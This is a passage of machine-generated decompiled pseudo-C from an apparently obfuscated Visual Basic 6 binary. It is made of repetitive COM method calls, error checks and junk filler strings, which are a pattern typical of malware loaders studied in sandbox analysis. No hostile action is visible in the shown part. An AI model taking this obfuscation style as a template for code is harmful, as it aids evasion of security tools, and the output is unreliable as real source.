				_v408 = _v120;
				_v120 = _v120 & 0x00000000;
				_v180 = _v408;
				_v188 = 8;
				_v412 = _v140;
				_v140 = _v140 & 0x00000000;
				_v164 = _v412;
				_v172 = 9;
				_v312 = _v308;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 =  *0x401190;
				_t1201 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, L"Unidyllic5", 0x801fec,  &_v312, _t1684, _t1684, 0x7c6360, 0x10,  &_v188,  &_v328);
				_v372 = _t1201;
				if(_v372 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x409ee0);
					_push(_a4);
					_push(_v372);
					L004015AC();
					_v484 = _t1201;
				}
				_v116 = _v328;
				_push( &_v144);
				_push( &_v136);
				_push( &_v132);
				_push(3);
				L004015A0();
				_push( &_v188);
				_push( &_v172);
				_push(2);
				L0040159A();
				_t1840 = _t1838 + 0x1c;
				if( *0x41e010 != 0) {
					_v488 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v488 = 0x41e010;
				}
				_t1210 =  &_v132;
				L004015B8();
				_v348 = _t1210;
				_t1214 =  *((intOrPtr*)( *_v348 + 0x118))(_v348,  &_v308, _t1210,  *((intOrPtr*)( *((intOrPtr*)( *_v488)) + 0x308))( *_v488));
				asm("fclex");
				_v352 = _t1214;
				if(_v352 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x40a120);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v492 = _t1214;
				}
				_v164 = 0x644120;
				_v172 = 3;
				_t1219 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v172, _v308,  &_v328);
				_v356 = _t1219;
				if(_v356 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x409ee0);
					_push(_a4);
					_push(_v356);
					L004015AC();
					_v496 = _t1219;
				}
				_v60 = _v328;
				L004015A6();
				L00401594();
				if( *0x41e010 != 0) {
					_v500 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v500 = 0x41e010;
				}
				_t1223 =  &_v132;
				L004015B8();
				_v348 = _t1223;
				_t1227 =  *((intOrPtr*)( *_v348 + 0x88))(_v348,  &_v308, _t1223,  *((intOrPtr*)( *((intOrPtr*)( *_v500)) + 0x300))( *_v500));
				asm("fclex");
				_v352 = _t1227;
				if(_v352 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x88);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v504 = _t1227;
				}
				if( *0x41e010 != 0) {
					_v508 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v508 = 0x41e010;
				}
				_t1695 =  *((intOrPtr*)( *_v508));
				_t1231 =  &_v136;
				L004015B8();
				_v356 = _t1231;
				_t1235 =  *((intOrPtr*)( *_v356 + 0x1a0))(_v356,  &_v312, _t1231,  *((intOrPtr*)(_t1695 + 0x2fc))( *_v508));
				asm("fclex");
				_v360 = _t1235;
				if(_v360 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x1a0);
					_push(0x40a0f4);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v512 = _t1235;
				}
				_v164 = _v312;
				_v172 = 3;
				 *_t1840 = _v308;
				_t1241 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0xcbeabdd0, 0x5afb, _t1695,  &_v172,  &_v188);
				_v364 = _t1241;
				if(_v364 >= 0) {
					_v516 = _v516 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x409ee0);
					_push(_a4);
					_push(_v364);
					L004015AC();
					_v516 = _t1241;
				}
				L0040158E();
				_push( &_v136);
				_push( &_v132);
				_push(2);
				L004015A0();
				_t1841 = _t1840 + 0xc;
				L00401594();
				if( *0x41e010 != 0) {
					_v520 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v520 = 0x41e010;
				}
				_t1700 =  *((intOrPtr*)( *_v520));
				_t1247 =  &_v132;
				L004015B8();
				_v348 = _t1247;
				_t1251 =  *((intOrPtr*)( *_v348 + 0x70))(_v348,  &_v308, _t1247,  *((intOrPtr*)(_t1700 + 0x2fc))( *_v520));
				asm("fclex");
				_v352 = _t1251;
				if(_v352 >= 0) {
					_v524 = _v524 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v524 = _t1251;
				}
				_v228 = 0x415f34;
				_v236 = 3;
				_v328 =  *0x401188;
				_v312 = 0x5507c2;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v276 = _v308;
				_v292 =  *0x401180;
				_v304 =  *0x401178;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, _t1700, _t1700,  &_v312, _t1700,  &_v328, 0x33e444a0, 0x5b02, _t1700, 0x10);
				L004015A6();
				if( *0x41e010 != 0) {
					_v528 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v528 = 0x41e010;
				}
				_t1704 =  *((intOrPtr*)( *_v528));
				_t1261 =  &_v132;
				L004015B8();
				_v348 = _t1261;
				_t1265 =  *((intOrPtr*)( *_v348 + 0x78))(_v348,  &_v308, _t1261,  *((intOrPtr*)(_t1704 + 0x310))( *_v528));
				asm("fclex");
				_v352 = _t1265;
				if(_v352 >= 0) {
					_v532 = _v532 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x40a120);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v532 = _t1265;
				}
				_v316 =  *0x401170;
				_v312 = _v308;
				_v228 = L"riges";
				_v236 = 8;
				_v348 =  *0x401168;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x740))(_a4, 0x10, _t1704, _t1704,  &_v312,  &_v316,  &_v320);
				_v84 = _v320;
				L004015A6();
				 *((intOrPtr*)( *_a4 + 0x744))(_a4);
				_t1280 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v172);
				_v348 = _t1280;
				if(_v348 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x409ee0);
					_push(_a4);
					_push(_v348);
					L004015AC();
					_v536 = _t1280;
				}
				L0040158E();
				if( *0x41e010 != 0) {
					_v540 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v540 = 0x41e010;
				}
				_t1284 =  &_v132;
				L004015B8();
				_v348 = _t1284;
				_t1288 =  *((intOrPtr*)( *_v348 + 0x170))(_v348,  &_v120, _t1284,  *((intOrPtr*)( *((intOrPtr*)( *_v540)) + 0x300))( *_v540));
				asm("fclex");
				_v352 = _t1288;
				if(_v352 >= 0) {
					_v544 = _v544 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v544 = _t1288;
				}
				if( *0x41e010 != 0) {
					_v548 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v548 = 0x41e010;
				}
				_t1292 =  &_v136;
				L004015B8();
				_v356 = _t1292;
				_t1296 =  *((intOrPtr*)( *_v356 + 0x138))(_v356,  &_v308, _t1292,  *((intOrPtr*)( *((intOrPtr*)( *_v548)) + 0x308))( *_v548));
				asm("fclex");
				_v360 = _t1296;
				if(_v360 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v552 = _t1296;
				}
				_v316 = _v308;
				_v344 =  *0x401160;
				_v228 = L"Laquearian";
				_v236 = 8;
				_v336 =  *0x401158;
				_v312 = 0x576d4;
				_v328 = 0xe211dc40;
				_v324 = 0x5b07;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1307 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v328,  &_v312,  &_v336, 0x10,  &_v344, _v120,  &_v316,  &_v288);
				_v364 = _t1307;
				if(_v364 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x409ee0);
					_push(_a4);
					_push(_v364);
					L004015AC();
					_v556 = _t1307;
				}
				_v92 = _v288;
				L00401588();
				L004015A0();
				_t1842 = _t1841 + 0xc;
				_t1313 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 2,  &_v132,  &_v136);
				_v348 = _t1313;
				if(_v348 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x409ee0);
					_push(_a4);
					_push(_v348);
					L004015AC();
					_v560 = _t1313;
				}
				 *((intOrPtr*)( *_a4 + 0x748))(_a4,  &_v328);
				_v32 = _v328;
				_v28 = _v324;
				if( *0x41e010 != 0) {
					_v564 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v564 = 0x41e010;
				}
				_t1323 =  &_v132;
				L004015B8();
				_v348 = _t1323;
				_t1327 =  *((intOrPtr*)( *_v348 + 0xa0))(_v348,  &_v288, _t1323,  *((intOrPtr*)( *((intOrPtr*)( *_v564)) + 0x310))( *_v564));
				asm("fclex");
				_v352 = _t1327;
				if(_v352 >= 0) {
					_v568 = _v568 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40a120);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v568 = _t1327;
				}
				if( *0x41e010 != 0) {
					_v572 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v572 = 0x41e010;
				}
				_t1331 =  &_v136;
				L004015B8();
				_v356 = _t1331;
				_t1335 =  *((intOrPtr*)( *_v356 + 0xa0))(_v356,  &_v292, _t1331,  *((intOrPtr*)( *((intOrPtr*)( *_v572)) + 0x310))( *_v572));
				asm("fclex");
				_v360 = _t1335;
				if(_v360 >= 0) {
					_v576 = _v576 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v576 = _t1335;
				}
				if( *0x41e010 != 0) {
					_v580 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v580 = 0x41e010;
				}
				_t1339 =  &_v140;
				L004015B8();
				_v364 = _t1339;
				_t1343 =  *((intOrPtr*)( *_v364 + 0xf0))(_v364,  &_v296, _t1339,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x308))( *_v580));
				asm("fclex");
				_v368 = _t1343;
				if(_v368 >= 0) {
					_v584 = _v584 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40a120);
					_push(_v364);
					_push(_v368);
					L004015AC();
					_v584 = _t1343;
				}
				if( *0x41e010 != 0) {
					_v588 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v588 = 0x41e010;
				}
				_t1347 =  &_v144;
				L004015B8();
				_v372 = _t1347;
				_t1351 =  *((intOrPtr*)( *_v372 + 0x178))(_v372,  &_v148, _t1347,  *((intOrPtr*)( *((intOrPtr*)( *_v588)) + 0x2fc))( *_v588));
				asm("fclex");
				_v376 = _t1351;
				if(_v376 >= 0) {
					_v592 = _v592 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40a0f4);
					_push(_v372);
					_push(_v376);
					L004015AC();
					_v592 = _t1351;
				}
				if( *0x41e010 != 0) {
					_v596 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v596 = 0x41e010;
				}
				_t1355 =  &_v152;
				L004015B8();
				_v380 = _t1355;
				_t1359 =  *((intOrPtr*)( *_v380 + 0x80))(_v380,  &_v308, _t1355,  *((intOrPtr*)( *((intOrPtr*)( *_v596)) + 0x300))( *_v596));
				asm("fclex");
				_v384 = _t1359;
				if(_v384 >= 0) {
					_v600 = _v600 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x40a0f4);
					_push(_v380);
					_push(_v384);
					L004015AC();
					_v600 = _t1359;
				}
				if( *0x41e010 != 0) {
					_v604 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v604 = 0x41e010;
				}
				_t1731 =  *((intOrPtr*)( *_v604));
				_t1363 =  &_v156;
				L004015B8();
				_v388 = _t1363;
				_t1367 =  *((intOrPtr*)( *_v388 + 0x188))(_v388,  &_v312, _t1363,  *((intOrPtr*)(_t1731 + 0x314))( *_v604));
				asm("fclex");
				_v392 = _t1367;
				if(_v392 >= 0) {
					_v608 = _v608 & 0x00000000;
				} else {
					_push(0x188);
					_push(0x40a120);
					_push(_v388);
					_push(_v392);
					L004015AC();
					_v608 = _t1367;
				}
				_v180 = 0xf487;
				_v188 = 3;
				_v416 = _v148;
				_v148 = _v148 & 0x00000000;
				_v164 = _v416;
				_v172 = 9;
				_v304 = _v296;
				_v316 = 0x11141;
				_v300 = _v292;
				_v584 = _v308;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v600 =  *0x401150;
				_t1380 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, _v288, 0x37b173,  &_v300, _t1731, _t1731,  &_v316,  &_v304, 0x10, _t1731,  &_v188, _v312,  &_v204);
				_v396 = _t1380;
				if(_v396 >= 0) {
					_v612 = _v612 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x409ee0);
					_push(_a4);
					_push(_v396);
					L004015AC();
					_v612 = _t1380;
				}
				L0040158E();
				_push( &_v156);
				_push( &_v152);
				_push( &_v144);
				_push( &_v140);
				_push( &_v136);
				_push( &_v132);
				_push(6);
				L004015A0();
				_push( &_v188);
				_push( &_v172);
				_push(2);
				L0040159A();
				_t1844 = _t1842 + 0x28;
				if( *0x41e010 != 0) {
					_v616 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v616 = 0x41e010;
				}
				_t1392 =  &_v132;
				L004015B8();
				_v348 = _t1392;
				_t1396 =  *((intOrPtr*)( *_v348 + 0x70))(_v348,  &_v308, _t1392,  *((intOrPtr*)( *((intOrPtr*)( *_v616)) + 0x310))( *_v616));
				asm("fclex");
				_v352 = _t1396;
				if(_v352 >= 0) {
					_v620 = _v620 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40a120);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v620 = _t1396;
				}
				if( *0x41e010 != 0) {
					_v624 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v624 = 0x41e010;
				}
				_t1400 =  &_v136;
				L004015B8();
				_v356 = _t1400;
				_t1404 =  *((intOrPtr*)( *_v356 + 0x108))(_v356,  &_v120, _t1400,  *((intOrPtr*)( *((intOrPtr*)( *_v624)) + 0x308))( *_v624));
				asm("fclex");
				_v360 = _t1404;
				if(_v360 >= 0) {
					_v628 = _v628 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v628 = _t1404;
				}
				_v420 = _v120;
				_v120 = _v120 & 0x00000000;
				_v164 = _v420;
				_v172 = 8;
				L00401582();
				_v664 = _v308;
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4,  &_v124, 0x25ca,  &_v124,  &_v172);
				L00401588();
				_push( &_v136);
				_push( &_v132);
				_push(2);
				L004015A0();
				_t1845 = _t1844 + 0xc;
				L00401594();
				if( *0x41e010 != 0) {
					_v632 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v632 = 0x41e010;
				}
				_t1417 =  &_v132;
				L004015B8();
				_v348 = _t1417;
				_t1421 =  *((intOrPtr*)( *_v348 + 0xf8))(_v348,  &_v136, _t1417,  *((intOrPtr*)( *((intOrPtr*)( *_v632)) + 0x304))( *_v632));
				asm("fclex");
				_v352 = _t1421;
				if(_v352 >= 0) {
					_v636 = _v636 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v636 = _t1421;
				}
				_push(0);
				_push(0);
				_push(_v136);
				_push( &_v188);
				L0040157C();
				_t1846 = _t1845 + 0x10;
				if( *0x41e010 != 0) {
					_v640 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v640 = 0x41e010;
				}
				_t1426 =  &_v140;
				L004015B8();
				_v356 = _t1426;
				_t1430 =  *((intOrPtr*)( *_v356 + 0xf8))(_v356,  &_v144, _t1426,  *((intOrPtr*)( *((intOrPtr*)( *_v640)) + 0x314))( *_v640));
				asm("fclex");
				_v360 = _t1430;
				if(_v360 >= 0) {
					_v644 = _v644 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v644 = _t1430;
				}
				_v424 = _v144;
				_v144 = _v144 & 0x00000000;
				_v212 = _v424;
				_v220 = 9;
				_v312 =  *0x40114c;
				_v276 = L"UNMELANCHOLY";
				_v284 = 8;
				_v260 = L"Pneumonoultramicroscopicsilicovolcanoconiosis";
				_v268 = 8;
				_v244 = L"Orthogenetic";
				_v252 = 8;
				L00401576();
				_t1433 =  &_v188;
				L00401570();
				_v308 = _t1433;
				_v328 = 0x4057c020;
				_v324 = 0x5af5;
				_v164 = 0x819770;
				_v172 = 3;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1445 =  *((intOrPtr*)( *_a4 + 0x714))(_a4, 0x68e8,  &_v172, 0x6b0109,  &_v328,  &_v308,  &_v204, 0x10, 0x10,  &_v312,  &_v220,  &_v316, _t1433);
				_v364 = _t1445;
				if(_v364 >= 0) {
					_v648 = _v648 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x409ee0);
					_push(_a4);
					_push(_v364);
					L004015AC();
					_v648 = _t1445;
				}
				_v88 = _v316;
				_push( &_v136);
				_push( &_v140);
				_push( &_v132);
				_push(3);
				L004015A0();
				_push( &_v220);
				_push( &_v204);
				_push( &_v188);
				_push( &_v172);
				_push(4);
				L0040159A();
				_t1848 = _t1846 + 0x24;
				if( *0x41e010 != 0) {
					_v652 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v652 = 0x41e010;
				}
				_t1457 =  &_v132;
				L004015B8();
				_v348 = _t1457;
				_t1461 =  *((intOrPtr*)( *_v348 + 0x110))(_v348,  &_v288, _t1457,  *((intOrPtr*)( *((intOrPtr*)( *_v652)) + 0x314))( *_v652));
				asm("fclex");
				_v352 = _t1461;
				if(_v352 >= 0) {
					_v656 = _v656 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x40a120);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v656 = _t1461;
				}
				if( *0x41e010 != 0) {
					_v660 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v660 = 0x41e010;
				}
				_t1465 =  &_v136;
				L004015B8();
				_v356 = _t1465;
				_t1469 =  *((intOrPtr*)( *_v356 + 0x50))(_v356,  &_v120, _t1465,  *((intOrPtr*)( *((intOrPtr*)( *_v660)) + 0x310))( *_v660));
				asm("fclex");
				_v360 = _t1469;
				if(_v360 >= 0) {
					_v664 = _v664 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v664 = _t1469;
				}
				if( *0x41e010 != 0) {
					_v668 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v668 = 0x41e010;
				}
				_t1473 =  &_v140;
				L004015B8();
				_v364 = _t1473;
				_t1477 =  *((intOrPtr*)( *_v364 + 0xf8))(_v364,  &_v124, _t1473,  *((intOrPtr*)( *((intOrPtr*)( *_v668)) + 0x318))( *_v668));
				asm("fclex");
				_v368 = _t1477;
				if(_v368 >= 0) {
					_v672 = _v672 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40a214);
					_push(_v364);
					_push(_v368);
					L004015AC();
					_v672 = _t1477;
				}
				_v428 = _v124;
				_v124 = _v124 & 0x00000000;
				_v164 = _v428;
				_v172 = 8;
				_v328 = 0x929e2990;
				_v324 = 0x5afb;
				_v308 =  *0x401148;
				_v432 = _v120;
				_v120 = _v120 & 0x00000000;
				L0040156A();
				_v292 = _v288;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v292,  &_v128,  &_v308,  &_v328,  &_v172, 0x3eabef);
				L00401588();
				_push( &_v140);
				_push( &_v136);
				_push( &_v132);
				_push(3);
				L004015A0();
				_t1849 = _t1848 + 0x10;
				L00401594();
				if( *0x41e010 != 0) {
					_v676 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v676 = 0x41e010;
				}
				_t1496 =  &_v132;
				L004015B8();
				_v348 = _t1496;
				_t1500 =  *((intOrPtr*)( *_v348 + 0x178))(_v348,  &_v136, _t1496,  *((intOrPtr*)( *((intOrPtr*)( *_v676)) + 0x304))( *_v676));
				asm("fclex");
				_v352 = _t1500;
				if(_v352 >= 0) {
					_v680 = _v680 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v680 = _t1500;
				}
				_push(0);
				_push(0);
				_push(_v136);
				_push( &_v172);
				L0040157C();
				_t1850 = _t1849 + 0x10;
				if( *0x41e010 != 0) {
					_v684 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v684 = 0x41e010;
				}
				_t1505 =  &_v140;
				L004015B8();
				_v356 = _t1505;
				_t1509 =  *((intOrPtr*)( *_v356 + 0x138))(_v356,  &_v308, _t1505,  *((intOrPtr*)( *((intOrPtr*)( *_v684)) + 0x30c))( *_v684));
				asm("fclex");
				_v360 = _t1509;
				if(_v360 >= 0) {
					_v688 = _v688 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v688 = _t1509;
				}
				if( *0x41e010 != 0) {
					_v692 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v692 = 0x41e010;
				}
				_t1769 =  *((intOrPtr*)( *_v692));
				_t1513 =  &_v144;
				L004015B8();
				_v364 = _t1513;
				_t1517 =  *((intOrPtr*)( *_v364 + 0x48))(_v364,  &_v120, _t1513,  *((intOrPtr*)(_t1769 + 0x304))( *_v692));
				asm("fclex");
				_v368 = _t1517;
				if(_v368 >= 0) {
					_v696 = _v696 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40a0f4);
					_push(_v364);
					_push(_v368);
					L004015AC();
					_v696 = _t1517;
				}
				_v336 =  *0x401140;
				_v312 = 0x2ffcdd;
				_v436 = _v120;
				_v120 = _v120 & 0x00000000;
				_v180 = _v436;
				_v188 = 8;
				_v328 =  *0x401138;
				 *_t1850 =  *0x401130;
				_t1525 =  &_v172;
				L00401570();
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, _t1525, _t1525, _t1769, _t1769, _v308, L"Juhl",  &_v328, 0x1aea6f70, 0x5afc,  &_v188,  &_v312, 0x6a14150, 0x5b07,  &_v336,  &_v288);
				_v36 = _v288;
				L004015A0();
				L0040159A();
				_t1852 = _t1850 + 0x20;
				_t1538 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v172,  &_v188, 4,  &_v132,  &_v140,  &_v144,  &_v136);
				asm("fclex");
				_v348 = _t1538;
				if(_v348 >= 0) {
					_v700 = _v700 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x409eb0);
					_push(_a4);
					_push(_v348);
					L004015AC();
					_v700 = _t1538;
				}
				L189:
				L189:
				if( *0x41e010 != 0) {
					_v704 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v704 = 0x41e010;
				}
				_t1542 =  &_v132;
				L004015B8();
				_v348 = _t1542;
				_t1546 =  *((intOrPtr*)( *_v348 + 0x178))(_v348,  &_v136, _t1542,  *((intOrPtr*)( *((intOrPtr*)( *_v704)) + 0x304))( *_v704));
				asm("fclex");
				_v352 = _t1546;
				if(_v352 >= 0) {
					_v708 = _v708 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v708 = _t1546;
				}
				_push(0);
				_push(0);
				_push(_v136);
				_push( &_v172);
				L0040157C();
				_t1853 = _t1852 + 0x10;
				if( *0x41e010 != 0) {
					_v712 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v712 = 0x41e010;
				}
				_t1551 =  &_v140;
				L004015B8();
				_v356 = _t1551;
				_t1555 =  *((intOrPtr*)( *_v356 + 0x138))(_v356,  &_v308, _t1551,  *((intOrPtr*)( *((intOrPtr*)( *_v712)) + 0x30c))( *_v712));
				asm("fclex");
				_v360 = _t1555;
				if(_v360 >= 0) {
					_v716 = _v716 & 0x00000000;
				} else {
					_push(0x138);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v716 = _t1555;
				}
				if( *0x41e010 != 0) {
					_v720 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v720 = 0x41e010;
				}
				_t1778 =  *((intOrPtr*)( *_v720));
				_t1559 =  &_v144;
				L004015B8();
				_v364 = _t1559;
				_t1563 =  *((intOrPtr*)( *_v364 + 0x48))(_v364,  &_v120, _t1559,  *((intOrPtr*)(_t1778 + 0x304))( *_v720));
				asm("fclex");
				_v368 = _t1563;
				if(_v368 >= 0) {
					_v724 = _v724 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40a0f4);
					_push(_v364);
					_push(_v368);
					L004015AC();
					_v724 = _t1563;
				}
				_v336 =  *0x401140;
				_v312 = 0x2ffcdd;
				_v440 = _v120;
				_v120 = _v120 & 0x00000000;
				_v180 = _v440;
				_v188 = 8;
				_v328 =  *0x401138;
				 *_t1853 =  *0x401130;
				_t1571 =  &_v172;
				L00401570();
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, _t1571, _t1571, _t1778, _t1778, _v308, L"Juhl",  &_v328, 0x1aea6f70, 0x5afc,  &_v188,  &_v312, 0x6a14150, 0x5b07,  &_v336,  &_v288);
				_v36 = _v288;
				_push( &_v136);
				_push( &_v144);
				_push( &_v140);
				_push( &_v132);
				_push(4);
				L004015A0();
				_push( &_v188);
				_push( &_v172);
				_push(2);
				L0040159A();
				_t1855 = _t1853 + 0x20;
				if( *0x41e010 != 0) {
					_v728 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v728 = 0x41e010;
				}
				_t1585 =  &_v132;
				L004015B8();
				_v348 = _t1585;
				_t1589 =  *((intOrPtr*)( *_v348 + 0x118))(_v348,  &_v308, _t1585,  *((intOrPtr*)( *((intOrPtr*)( *_v728)) + 0x308))( *_v728));
				asm("fclex");
				_v352 = _t1589;
				if(_v352 >= 0) {
					_v732 = _v732 & 0x00000000;
				} else {
					_push(0x118);
					_push(0x40a120);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v732 = _t1589;
				}
				_v164 = 0x644120;
				_v172 = 3;
				_t1594 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v172, _v308,  &_v328);
				_v356 = _t1594;
				if(_v356 >= 0) {
					_v736 = _v736 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x409ee0);
					_push(_a4);
					_push(_v356);
					L004015AC();
					_v736 = _t1594;
				}
				_v60 = _v328;
				L004015A6();
				L00401594();
				if( *0x41e010 != 0) {
					_v740 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v740 = 0x41e010;
				}
				_t1598 =  &_v132;
				L004015B8();
				_v348 = _t1598;
				_t1602 =  *((intOrPtr*)( *_v348 + 0x110))(_v348,  &_v288, _t1598,  *((intOrPtr*)( *((intOrPtr*)( *_v740)) + 0x314))( *_v740));
				asm("fclex");
				_v352 = _t1602;
				if(_v352 >= 0) {
					_v744 = _v744 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x40a120);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v744 = _t1602;
				}
				if( *0x41e010 != 0) {
					_v748 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v748 = 0x41e010;
				}
				_t1606 =  &_v136;
				L004015B8();
				_v356 = _t1606;
				_t1610 =  *((intOrPtr*)( *_v356 + 0x50))(_v356,  &_v120, _t1606,  *((intOrPtr*)( *((intOrPtr*)( *_v748)) + 0x310))( *_v748));
				asm("fclex");
				_v360 = _t1610;
				if(_v360 >= 0) {
					_v752 = _v752 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v752 = _t1610;
				}
				if( *0x41e010 != 0) {
					_v756 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v756 = 0x41e010;
				}
				_t1614 =  &_v140;
				L004015B8();
				_v364 = _t1614;
				_t1618 =  *((intOrPtr*)( *_v364 + 0xf8))(_v364,  &_v124, _t1614,  *((intOrPtr*)( *((intOrPtr*)( *_v756)) + 0x318))( *_v756));
				asm("fclex");
				_v368 = _t1618;
				if(_v368 >= 0) {
					_v760 = _v760 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40a214);
					_push(_v364);
					_push(_v368);
